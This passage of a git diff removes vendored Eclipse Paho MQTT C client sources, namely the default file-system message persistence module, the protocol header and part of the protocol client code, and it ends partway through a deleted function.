diff --git a/thirdparty/paho.mqtt.c/src/MQTTPersistenceDefault.c b/thirdparty/paho.mqtt.c/src/MQTTPersistenceDefault.c
deleted file mode 100644
index 35c1f53..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPersistenceDefault.c
+++ /dev/null
@@ -1,841 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2016 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - async client updates
- *    Ian Craggs - fix for bug 484496
- *******************************************************************************/
-
-/**
- * @file
- * \brief A file system based persistence implementation.
- *
- * A directory is specified when the MQTT client is created. When the persistence is then
- * opened (see ::Persistence_open), a sub-directory is made beneath the base for this
- * particular client ID and connection key. This allows one persistence base directory to
- * be shared by multiple clients.
- *
- */
-
-#if !defined(NO_PERSISTENCE)
-
-#include "OsWrapper.h"
-
-#include <stdio.h>
-#include <string.h>
-#include <errno.h>
-
-#if defined(WIN32) || defined(WIN64)
-	#include <direct.h>
-	/* Windows doesn't have strtok_r, so remap it to strtok */
-	#define strtok_r( A, B, C ) strtok( A, B )
-	int keysWin32(char *, char ***, int *);
-	int clearWin32(char *);
-	int containskeyWin32(char *, char *);
-#else
-	#include <sys/stat.h>
-	#include <dirent.h>
-	#include <unistd.h>
-	int keysUnix(char *, char ***, int *);
-	int clearUnix(char *);
-	int containskeyUnix(char *, char *);
-#endif
-
-#include "MQTTClientPersistence.h"
-#include "MQTTPersistenceDefault.h"
-#include "StackTrace.h"
-#include "Heap.h"
-
-/** Create persistence directory for the client: context/clientID-serverURI.
- *  See ::Persistence_open
- */
-
-int pstopen(void **handle, const char* clientID, const char* serverURI, void* context)
-{
-	int rc = 0;
-	char *dataDir = context;
-	char *clientDir;
-	char *pToken = NULL;
-	char *save_ptr = NULL;
-	char *pCrtDirName = NULL;
-	char *pTokDirName = NULL;
-	char *perserverURI = NULL, *ptraux;
-
-	FUNC_ENTRY;
-	/* Note that serverURI=address:port, but ":" not allowed in Windows directories */
-	perserverURI = malloc(strlen(serverURI) + 1);
-	strcpy(perserverURI, serverURI);
-	while ((ptraux = strstr(perserverURI, ":")) != NULL)

-		*ptraux = '-' ;
-
-	/* consider '/'  +  '-'  +  '\0' */
-	clientDir = malloc(strlen(dataDir) + strlen(clientID) + strlen(perserverURI) + 3);
-	sprintf(clientDir, "%s/%s-%s", dataDir, clientID, perserverURI);
-
-
-	/* create clientDir directory */
-
-	/* pCrtDirName - holds the directory name we are currently trying to create.           */
-	/*               This gets built up level by level until the full path name is created.*/
-	/* pTokDirName - holds the directory name that gets used by strtok.         */
-	pCrtDirName = (char*)malloc( strlen(clientDir) + 1 );
-	pTokDirName = (char*)malloc( strlen(clientDir) + 1 );
-	strcpy( pTokDirName, clientDir );
-
-	pToken = strtok_r( pTokDirName, "\\/", &save_ptr );
-
-	strcpy( pCrtDirName, pToken );
-	rc = pstmkdir( pCrtDirName );
-	pToken = strtok_r( NULL, "\\/", &save_ptr );
-	while ( (pToken != NULL) && (rc == 0) )
-	{
-		/* Append the next directory level and try to create it */
-		strcat( pCrtDirName, "/" );
-		strcat( pCrtDirName, pToken );
-		rc = pstmkdir( pCrtDirName );
-		pToken = strtok_r( NULL, "\\/", &save_ptr );
-	}
-
-	*handle = clientDir;
-
-	free(pTokDirName);
-	free(pCrtDirName);
-	free(perserverURI);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-/** Function to create a directory.
- * Returns 0 on success or if the directory already exists.
- */
-int pstmkdir( char *pPathname )
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	if ( _mkdir( pPathname ) != 0 )
-	{
-#else
-	/* Create a directory with read, write and execute access for the owner and read access for the group */
-#if !defined(_WRS_KERNEL)
-	if ( mkdir( pPathname, S_IRWXU | S_IRGRP ) != 0 )
-#else
-	if ( mkdir( pPathname ) != 0 )
-#endif /* !defined(_WRS_KERNEL) */
-	{
-#endif
-		if ( errno != EEXIST )
-			rc = MQTTCLIENT_PERSISTENCE_ERROR;
-	}
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-/** Write wire message to the client persistence directory.
- *  See ::Persistence_put
- */
-int pstput(void* handle, char* key, int bufcount, char* buffers[], int buflens[])
-{
-	int rc = 0;
-	char *clientDir = handle;
-	char *file;
-	FILE *fp;
-	size_t bytesWritten = 0,
-	       bytesTotal = 0;
-	int i;
-
-	FUNC_ENTRY;
-	if (clientDir == NULL)
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-	/* consider '/' + '\0' */
-	file = malloc(strlen(clientDir) + strlen(key) + strlen(MESSAGE_FILENAME_EXTENSION) + 2 );
-	sprintf(file, "%s/%s%s", clientDir, key, MESSAGE_FILENAME_EXTENSION);
-
-	fp = fopen(file, "wb");
-	if ( fp != NULL )
-	{
-		for(i=0; i<bufcount; i++)
-		{
-			bytesTotal += buflens[i];
-			bytesWritten += fwrite(buffers[i], sizeof(char), buflens[i], fp );
-		}
-		fclose(fp);
-		fp = NULL;
-	} else
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-
-	if (bytesWritten != bytesTotal)
-	{
-		pstremove(handle, key);
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-	}
-
-	free(file);
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-};
-
-
-/** Retrieve a wire message from the client persistence directory.
- *  See ::Persistence_get
- */
-int pstget(void* handle, char* key, char** buffer, int* buflen)
-{
-	int rc = 0;
-	FILE *fp;
-	char *clientDir = handle;
-	char *file;
-	char *buf;
-	unsigned long fileLen = 0;
-	unsigned long bytesRead = 0;
-
-	FUNC_ENTRY;
-	if (clientDir == NULL)
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-	/* consider '/' + '\0' */
-	file = malloc(strlen(clientDir) + strlen(key) + strlen(MESSAGE_FILENAME_EXTENSION) + 2);
-	sprintf(file, "%s/%s%s", clientDir, key, MESSAGE_FILENAME_EXTENSION);
-
-	fp = fopen(file, "rb");
-	if ( fp != NULL )
-	{
-		fseek(fp, 0, SEEK_END);
-		fileLen = ftell(fp);
-		fseek(fp, 0, SEEK_SET);
-		buf=(char *)malloc(fileLen);
-		bytesRead = (int)fread(buf, sizeof(char), fileLen, fp);
-		*buffer = buf;
-		*buflen = bytesRead;
-		if ( bytesRead != fileLen )
-			rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		fclose(fp);
-		fp = NULL;
-	} else
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-
-	free(file);
-	/* the caller must free buf */
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-/** Delete a persisted message from the client persistence directory.
- *  See ::Persistence_remove
- */
-int pstremove(void* handle, char* key)
-{
-	int rc = 0;
-	char *clientDir = handle;
-	char *file;
-
-	FUNC_ENTRY;
-	if (clientDir == NULL)
-	{
-		return rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-	/* consider '/' + '\0' */
-	file = malloc(strlen(clientDir) + strlen(key) + strlen(MESSAGE_FILENAME_EXTENSION) + 2);
-	sprintf(file, "%s/%s%s", clientDir, key, MESSAGE_FILENAME_EXTENSION);
-
-#if defined(WIN32) || defined(WIN64)
-	if ( _unlink(file) != 0 )
-	{
-#else
-	if ( unlink(file) != 0 )
-	{
-#endif
-		if ( errno != ENOENT )
-			rc = MQTTCLIENT_PERSISTENCE_ERROR;
-	}
-
-	free(file);
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/** Delete client persistence directory (if empty).
- *  See ::Persistence_close
- */
-int pstclose(void* handle)
-{
-	int rc = 0;
-	char *clientDir = handle;
-
-	FUNC_ENTRY;
-	if (clientDir == NULL)
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-#if defined(WIN32) || defined(WIN64)
-	if ( _rmdir(clientDir) != 0 )
-	{
-#else
-	if ( rmdir(clientDir) != 0 )
-	{
-#endif
-		if ( errno != ENOENT && errno != ENOTEMPTY )
-			rc = MQTTCLIENT_PERSISTENCE_ERROR;
-	}
-
-	free(clientDir);
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/** Returns whether if a wire message is persisted in the client persistence directory.
- * See ::Persistence_containskey
- */
-int pstcontainskey(void *handle, char *key)
-{
-	int rc = 0;
-	char *clientDir = handle;
-
-	FUNC_ENTRY;
-	if (clientDir == NULL)
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-#if defined(WIN32) || defined(WIN64)
-	rc = containskeyWin32(clientDir, key);
-#else
-	rc = containskeyUnix(clientDir, key);
-#endif
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-#if defined(WIN32) || defined(WIN64)
-int containskeyWin32(char *dirname, char *key)
-{
-	int notFound = MQTTCLIENT_PERSISTENCE_ERROR;
-	int fFinished = 0;
-	char *filekey, *ptraux;
-	char dir[MAX_PATH+1];
-	WIN32_FIND_DATAA FileData;
-	HANDLE hDir;
-
-	FUNC_ENTRY;
-	sprintf(dir, "%s/*", dirname);
-
-	hDir = FindFirstFileA(dir, &FileData);
-	if (hDir != INVALID_HANDLE_VALUE)
-	{
-		while (!fFinished)
-		{
-			if (FileData.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE)
-			{
-				filekey = malloc(strlen(FileData.cFileName) + 1);
-				strcpy(filekey, FileData.cFileName);
-				ptraux = strstr(filekey, MESSAGE_FILENAME_EXTENSION);
-				if ( ptraux != NULL )
-					*ptraux = '\0' ;
-				if(strcmp(filekey, key) == 0)
-				{
-					notFound = 0;
-					fFinished = 1;
-				}
-				free(filekey);
-			}
-			if (!FindNextFileA(hDir, &FileData))
-			{
-				if (GetLastError() == ERROR_NO_MORE_FILES)
-					fFinished = 1;
-			}
-		}
-		FindClose(hDir);
-	}
-
-	FUNC_EXIT_RC(notFound);
-	return notFound;
-}
-#else
-int containskeyUnix(char *dirname, char *key)
-{
-	int notFound = MQTTCLIENT_PERSISTENCE_ERROR;
-	char *filekey, *ptraux;
-	DIR *dp;
-	struct dirent *dir_entry;
-	struct stat stat_info;
-
-	FUNC_ENTRY;
-	if((dp = opendir(dirname)) != NULL)
-	{
-		while((dir_entry = readdir(dp)) != NULL && notFound)
-		{
-			char* filename = malloc(strlen(dirname) + strlen(dir_entry->d_name) + 2);
-			sprintf(filename, "%s/%s", dirname, dir_entry->d_name);
-			lstat(filename, &stat_info);
-			free(filename);
-			if(S_ISREG(stat_info.st_mode))
-			{
-				filekey = malloc(strlen(dir_entry->d_name) + 1);
-				strcpy(filekey, dir_entry->d_name);
-				ptraux = strstr(filekey, MESSAGE_FILENAME_EXTENSION);
-				if ( ptraux != NULL )
-					*ptraux = '\0' ;
-				if(strcmp(filekey, key) == 0)
-					notFound = 0;
-				free(filekey);
-			}
-		}
-		closedir(dp);
-	}
-
-	FUNC_EXIT_RC(notFound);
-	return notFound;
-}
-#endif
-
-
-/** Delete all the persisted message in the client persistence directory.
- * See ::Persistence_clear
- */
-int pstclear(void *handle)
-{
-	int rc = 0;
-	char *clientDir = handle;
-
-	FUNC_ENTRY;
-	if (clientDir == NULL)
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-#if defined(WIN32) || defined(WIN64)
-	rc = clearWin32(clientDir);
-#else
-	rc = clearUnix(clientDir);
-#endif
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-#if defined(WIN32) || defined(WIN64)
-int clearWin32(char *dirname)
-{
-	int rc = 0;
-	int fFinished = 0;
-	char *file;
-	char dir[MAX_PATH+1];
-	WIN32_FIND_DATAA FileData;
-	HANDLE hDir;
-
-	FUNC_ENTRY;
-	sprintf(dir, "%s/*", dirname);
-
-	hDir = FindFirstFileA(dir, &FileData);
-	if (hDir != INVALID_HANDLE_VALUE)
-	{
-		while (!fFinished)
-		{
-			if (FileData.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE)
-			{
-				file = malloc(strlen(dirname) + strlen(FileData.cFileName) + 2);
-				sprintf(file, "%s/%s", dirname, FileData.cFileName);
-				rc = remove(file);
-				free(file);
-				if ( rc != 0 )
-				{
-					rc = MQTTCLIENT_PERSISTENCE_ERROR;
-					break;
-				}
-			}
-			if (!FindNextFileA(hDir, &FileData))
-			{
-				if (GetLastError() == ERROR_NO_MORE_FILES)
-					fFinished = 1;
-			}
-		}
-		FindClose(hDir);
-	} else
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-#else
-int clearUnix(char *dirname)
-{
-	int rc = 0;
-	DIR *dp;
-	struct dirent *dir_entry;
-	struct stat stat_info;
-
-	FUNC_ENTRY;
-	if((dp = opendir(dirname)) != NULL)
-	{
-		while((dir_entry = readdir(dp)) != NULL && rc == 0)
-		{
-			lstat(dir_entry->d_name, &stat_info);
-			if(S_ISREG(stat_info.st_mode))
-			{
-				if ( remove(dir_entry->d_name) != 0 )
-					rc = MQTTCLIENT_PERSISTENCE_ERROR;
-			}
-		}
-		closedir(dp);
-	} else
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-#endif
-
-
-/** Returns the keys (file names w/o the extension) in the client persistence directory.
- *  See ::Persistence_keys
- */
-int pstkeys(void *handle, char ***keys, int *nkeys)
-{
-	int rc = 0;
-	char *clientDir = handle;
-
-	FUNC_ENTRY;
-	if (clientDir == NULL)
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-#if defined(WIN32) || defined(WIN64)
-	rc = keysWin32(clientDir, keys, nkeys);
-#else
-	rc = keysUnix(clientDir, keys, nkeys);
-#endif
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-#if defined(WIN32) || defined(WIN64)
-int keysWin32(char *dirname, char ***keys, int *nkeys)
-{
-	int rc = 0;
-	char **fkeys = NULL;
-	int nfkeys = 0;
-	char dir[MAX_PATH+1];
-	WIN32_FIND_DATAA FileData;
-	HANDLE hDir;
-	int fFinished = 0;
-	char *ptraux;
-	int i;
-
-	FUNC_ENTRY;
-	sprintf(dir, "%s/*", dirname);
-
-	/* get number of keys */
-	hDir = FindFirstFileA(dir, &FileData);
-	if (hDir != INVALID_HANDLE_VALUE)
-	{
-		while (!fFinished)
-		{
-			if (FileData.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE)
-				nfkeys++;
-			if (!FindNextFileA(hDir, &FileData))
-			{
-				if (GetLastError() == ERROR_NO_MORE_FILES)
-					fFinished = 1;
-			}
-		}
-		FindClose(hDir);
-	} else
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-	if (nfkeys != 0 )
-		fkeys = (char **)malloc(nfkeys * sizeof(char *));
-
-	/* copy the keys */
-	hDir = FindFirstFileA(dir, &FileData);
-	if (hDir != INVALID_HANDLE_VALUE)
-	{
-		fFinished = 0;
-		i = 0;
-		while (!fFinished)
-		{
-			if (FileData.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE)
-			{
-				fkeys[i] = malloc(strlen(FileData.cFileName) + 1);
-				strcpy(fkeys[i], FileData.cFileName);
-				ptraux = strstr(fkeys[i], MESSAGE_FILENAME_EXTENSION);
-				if ( ptraux != NULL )
-					*ptraux = '\0' ;
-				i++;
-			}
-			if (!FindNextFileA(hDir, &FileData))
-			{
-				if (GetLastError() == ERROR_NO_MORE_FILES)
-					fFinished = 1;
-			}
-		}
-		FindClose(hDir);
-	} else
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-	*nkeys = nfkeys;
-	*keys = fkeys;
-	/* the caller must free keys */
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-#else
-int keysUnix(char *dirname, char ***keys, int *nkeys)
-{
-	int rc = 0;
-	char **fkeys = NULL;
-	int nfkeys = 0;
-	char *ptraux;
-	int i;
-	DIR *dp;
-	struct dirent *dir_entry;
-	struct stat stat_info;
-
-	FUNC_ENTRY;
-	/* get number of keys */
-	if((dp = opendir(dirname)) != NULL)
-	{
-		while((dir_entry = readdir(dp)) != NULL)
-		{
-			char* temp = malloc(strlen(dirname)+strlen(dir_entry->d_name)+2);
-
-			sprintf(temp, "%s/%s", dirname, dir_entry->d_name);
-			if (lstat(temp, &stat_info) == 0 && S_ISREG(stat_info.st_mode))
-				nfkeys++;
-			free(temp);
-		}
-		closedir(dp);
-	} else
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-	if (nfkeys != 0)
-	{
-		fkeys = (char **)malloc(nfkeys * sizeof(char *));
-
-		/* copy the keys */
-		if((dp = opendir(dirname)) != NULL)
-		{
-			i = 0;
-			while((dir_entry = readdir(dp)) != NULL)
-			{
-				char* temp = malloc(strlen(dirname)+strlen(dir_entry->d_name)+2);
-	
-				sprintf(temp, "%s/%s", dirname, dir_entry->d_name);
-				if (lstat(temp, &stat_info) == 0 && S_ISREG(stat_info.st_mode))
-				{
-					fkeys[i] = malloc(strlen(dir_entry->d_name) + 1);
-					strcpy(fkeys[i], dir_entry->d_name);
-					ptraux = strstr(fkeys[i], MESSAGE_FILENAME_EXTENSION);
-					if ( ptraux != NULL )
-						*ptraux = '\0' ;
-					i++;
-				}
-				free(temp);
-			}
-			closedir(dp);
-		} else
-		{
-			rc = MQTTCLIENT_PERSISTENCE_ERROR;
-			goto exit;
-		}
-	}
-
-	*nkeys = nfkeys;
-	*keys = fkeys;
-	/* the caller must free keys */
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-#endif
-
-
-
-#if defined(UNIT_TESTS)
-int main (int argc, char *argv[])
-{
-#define MSTEM "m-"
-#define NMSGS 10
-#define NBUFS 4
-#define NDEL 2
-#define RC !rc ? "(Success)" : "(Failed) "
-
-	int rc;
-	char *handle;
-	char *perdir = ".";
-	const char *clientID = "TheUTClient";
-	const char *serverURI = "127.0.0.1:1883";
-
-	char *stem = MSTEM;
-	int msgId, i;
-	int nm[NDEL] = {5 , 8};  /* msgIds to get and remove */
-
-	char *key;
-	char **keys;
-	int nkeys;
-	char *buffer, *buff;
-	int buflen;
-
-	int nbufs = NBUFS;
-	char *bufs[NBUFS] = {"m0", "mm1", "mmm2" , "mmmm3"};  /* message content */
-	int buflens[NBUFS];
-	for(i=0;i<nbufs;i++)
-		buflens[i]=strlen(bufs[i]);
-
-	/* open */
-	/* printf("Persistence directory : %s\n", perdir); */
-	rc = pstopen((void**)&handle, clientID, serverURI, perdir);
-	printf("%s Persistence directory for client %s : %s\n", RC, clientID, handle);
-
-	/* put */
-	for(msgId=0;msgId<NMSGS;msgId++)
-	{
-		key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-		sprintf(key, "%s%d", stem, msgId);
-		rc = pstput(handle, key, nbufs, bufs, buflens);
-		printf("%s Adding message %s\n", RC, key);
-		free(key);
-	}
-
-	/* keys ,ie, list keys added */
-	rc = pstkeys(handle, &keys, &nkeys);
-	printf("%s Found %d messages persisted in %s\n", RC, nkeys, handle);
-	for(i=0;i<nkeys;i++)
-		printf("%13s\n", keys[i]);
-
-	if (keys !=NULL)
-		free(keys);
-
-	/* containskey */
-	for(i=0;i<NDEL;i++)
-	{
-		key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-		sprintf(key, "%s%d", stem, nm[i]);
-		rc = pstcontainskey(handle, key);
-		printf("%s Message %s is persisted ?\n", RC, key);
-		free(key);
-	}
-
-	/* get && remove*/
-	for(i=0;i<NDEL;i++)
-	{
-		key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-		sprintf(key, "%s%d", stem, nm[i]);
-		rc = pstget(handle, key, &buffer, &buflen);
-		buff = malloc(buflen+1);
-		memcpy(buff, buffer, buflen);
-		buff[buflen] = '\0';
-		printf("%s Retrieving message %s : %s\n", RC, key, buff);
-		rc = pstremove(handle, key);
-		printf("%s Removing message %s\n", RC, key);
-		free(key);
-		free(buff);
-		free(buffer);
-	}
-
-	/* containskey */
-	for(i=0;i<NDEL;i++)
-	{
-		key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-		sprintf(key, "%s%d", stem, nm[i]);
-		rc = pstcontainskey(handle, key);
-		printf("%s Message %s is persisted ?\n", RC, key);
-		free(key);
-	}
-
-	/* keys ,ie, list keys added */
-	rc = pstkeys(handle, &keys, &nkeys);
-	printf("%s Found %d messages persisted in %s\n", RC, nkeys, handle);
-	for(i=0;i<nkeys;i++)
-		printf("%13s\n", keys[i]);
-
-	if (keys != NULL)
-		free(keys);
-
-
-	/* close -> it will fail, since client persistence directory is not empty */
-	rc = pstclose(&handle);
-	printf("%s Closing client persistence directory for client %s\n", RC, clientID);
-
-	/* clear */
-	rc = pstclear(handle);
-	printf("%s Deleting all persisted messages in %s\n", RC, handle);
-
-	/* keys ,ie, list keys added */
-	rc = pstkeys(handle, &keys, &nkeys);
-	printf("%s Found %d messages persisted in %s\n", RC, nkeys, handle);
-	for(i=0;i<nkeys;i++)
-		printf("%13s\n", keys[i]);
-
-	if ( keys != NULL )
-		free(keys);
-
-	/* close */
-	rc = pstclose(&handle);
-	printf("%s Closing client persistence directory for client %s\n", RC, clientID);
-}
-#endif
-
-
-#endif /* NO_PERSISTENCE */
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPersistenceDefault.h b/thirdparty/paho.mqtt.c/src/MQTTPersistenceDefault.h
deleted file mode 100644
index 27fedd6..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPersistenceDefault.h
+++ /dev/null
@@ -1,33 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-/** 8.3 filesystem */
-#define MESSAGE_FILENAME_LENGTH 8    
-/** Extension of the filename */
-#define MESSAGE_FILENAME_EXTENSION ".msg"
-
-/* prototypes of the functions for the default file system persistence */
-int pstopen(void** handle, const char* clientID, const char* serverURI, void* context); 
-int pstclose(void* handle); 
-int pstput(void* handle, char* key, int bufcount, char* buffers[], int buflens[]); 
-int pstget(void* handle, char* key, char** buffer, int* buflen); 
-int pstremove(void* handle, char* key); 
-int pstkeys(void* handle, char*** keys, int* nkeys); 
-int pstclear(void* handle); 
-int pstcontainskey(void* handle, char* key);
-
-int pstmkdir(char *pPathname);
-
diff --git a/thirdparty/paho.mqtt.c/src/MQTTProtocol.h b/thirdparty/paho.mqtt.c/src/MQTTProtocol.h
deleted file mode 100644
index 7478103..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTProtocol.h
+++ /dev/null
@@ -1,46 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - MQTT 3.1.1 updates
- *******************************************************************************/
-
-#if !defined(MQTTPROTOCOL_H)
-#define MQTTPROTOCOL_H
-
-#include "LinkedList.h"
-#include "MQTTPacket.h"
-#include "Clients.h"
-
-#define MAX_MSG_ID 65535
-#define MAX_CLIENTID_LEN 65535
-
-typedef struct
-{
-	int socket;
-	Publications* p;
-} pending_write;
-
-
-typedef struct
-{
-	List publications;
-	unsigned int msgs_received;
-	unsigned int msgs_sent;
-	List pending_writes; /* for qos 0 writes not complete */
-} MQTTProtocol;
-
-
-#include "MQTTProtocolOut.h"
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTProtocolClient.c b/thirdparty/paho.mqtt.c/src/MQTTProtocolClient.c
deleted file mode 100644
index fa3ff63..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTProtocolClient.c
+++ /dev/null
@@ -1,769 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - fix for bug 413429 - connectionLost not called
- *    Ian Craggs - fix for bug 421103 - trying to write to same socket, in retry
- *    Rong Xiang, Ian Craggs - C++ compatibility
- *    Ian Craggs - turn off DUP flag for PUBREL - MQTT 3.1.1
- *******************************************************************************/
-
-/**
- * @file
- * \brief Functions dealing with the MQTT protocol exchanges
- *
- * Some other related functions are in the MQTTProtocolOut module
- * */
-
-
-#include <stdlib.h>
-#include <string.h>
-
-#include "MQTTProtocolClient.h"
-#if !defined(NO_PERSISTENCE)
-#include "MQTTPersistence.h"
-#endif
-#include "SocketBuffer.h"
-#include "StackTrace.h"
-#include "Heap.h"
-
-#if !defined(min)
-#define min(A,B) ( (A) < (B) ? (A):(B))
-#endif
-
-extern MQTTProtocol state;
-extern ClientStates* bstate;
-
-
-static void MQTTProtocol_storeQoS0(Clients* pubclient, Publish* publish);
-static int MQTTProtocol_startPublishCommon(
-		Clients* pubclient,
-		Publish* publish,
-		int qos,
-		int retained);
-static void MQTTProtocol_retries(time_t now, Clients* client, int regardless);
-
-/**
- * List callback function for comparing Message structures by message id
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-int messageIDCompare(void* a, void* b)
-{
-	Messages* msg = (Messages*)a;
-	return msg->msgid == *(int*)b;
-}
-
-
-/**
- * Assign a new message id for a client.  Make sure it isn't already being used and does
- * not exceed the maximum.
- * @param client a client structure
- * @return the next message id to use, or 0 if none available
- */
-int MQTTProtocol_assignMsgId(Clients* client)
-{
-	int start_msgid = client->msgID;
-	int msgid = start_msgid;
-
-	FUNC_ENTRY;
-	msgid = (msgid == MAX_MSG_ID) ? 1 : msgid + 1;
-	while (ListFindItem(client->outboundMsgs, &msgid, messageIDCompare) != NULL)
-	{
-		msgid = (msgid == MAX_MSG_ID) ? 1 : msgid + 1;
-		if (msgid == start_msgid) 
-		{ /* we've tried them all - none free */
-			msgid = 0;
-			break;
-		}
-	}
-	if (msgid != 0)
-		client->msgID = msgid;
-	FUNC_EXIT_RC(msgid);
-	return msgid;
-}
-
-
-static void MQTTProtocol_storeQoS0(Clients* pubclient, Publish* publish)
-{
-	int len;
-	pending_write* pw = NULL;
-
-	FUNC_ENTRY;
-	/* store the publication until the write is finished */
-	pw = malloc(sizeof(pending_write));
-	Log(TRACE_MIN, 12, NULL);
-	pw->p = MQTTProtocol_storePublication(publish, &len);
-	pw->socket = pubclient->net.socket;
-	ListAppend(&(state.pending_writes), pw, sizeof(pending_write)+len);
-	/* we don't copy QoS 0 messages unless we have to, so now we have to tell the socket buffer where
-	the saved copy is */
-	if (SocketBuffer_updateWrite(pw->socket, pw->p->topic, pw->p->payload) == NULL)
-		Log(LOG_SEVERE, 0, "Error updating write");
-	FUNC_EXIT;
-}
-
-
-/**
- * Utility function to start a new publish exchange.
- * @param pubclient the client to send the publication to
- * @param publish the publication data
- * @param qos the MQTT QoS to use
- * @param retained boolean - whether to set the MQTT retained flag
- * @return the completion code
- */
-static int MQTTProtocol_startPublishCommon(Clients* pubclient, Publish* publish, int qos, int retained)
-{
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	rc = MQTTPacket_send_publish(publish, 0, qos, retained, &pubclient->net, pubclient->clientID);
-	if (qos == 0 && rc == TCPSOCKET_INTERRUPTED)
-		MQTTProtocol_storeQoS0(pubclient, publish);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Start a new publish exchange.  Store any state necessary and try to send the packet
- * @param pubclient the client to send the publication to
- * @param publish the publication data
- * @param qos the MQTT QoS to use
- * @param retained boolean - whether to set the MQTT retained flag
- * @param mm - pointer to the message to send
- * @return the completion code
- */
-int MQTTProtocol_startPublish(Clients* pubclient, Publish* publish, int qos, int retained, Messages** mm)
-{
-	Publish p = *publish;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (qos > 0)
-	{
-		*mm = MQTTProtocol_createMessage(publish, mm, qos, retained);
-		ListAppend(pubclient->outboundMsgs, *mm, (*mm)->len);
-		/* we change these pointers to the saved message location just in case the packet could not be written
-		entirely; the socket buffer will use these locations to finish writing the packet */
-		p.payload = (*mm)->publish->payload;
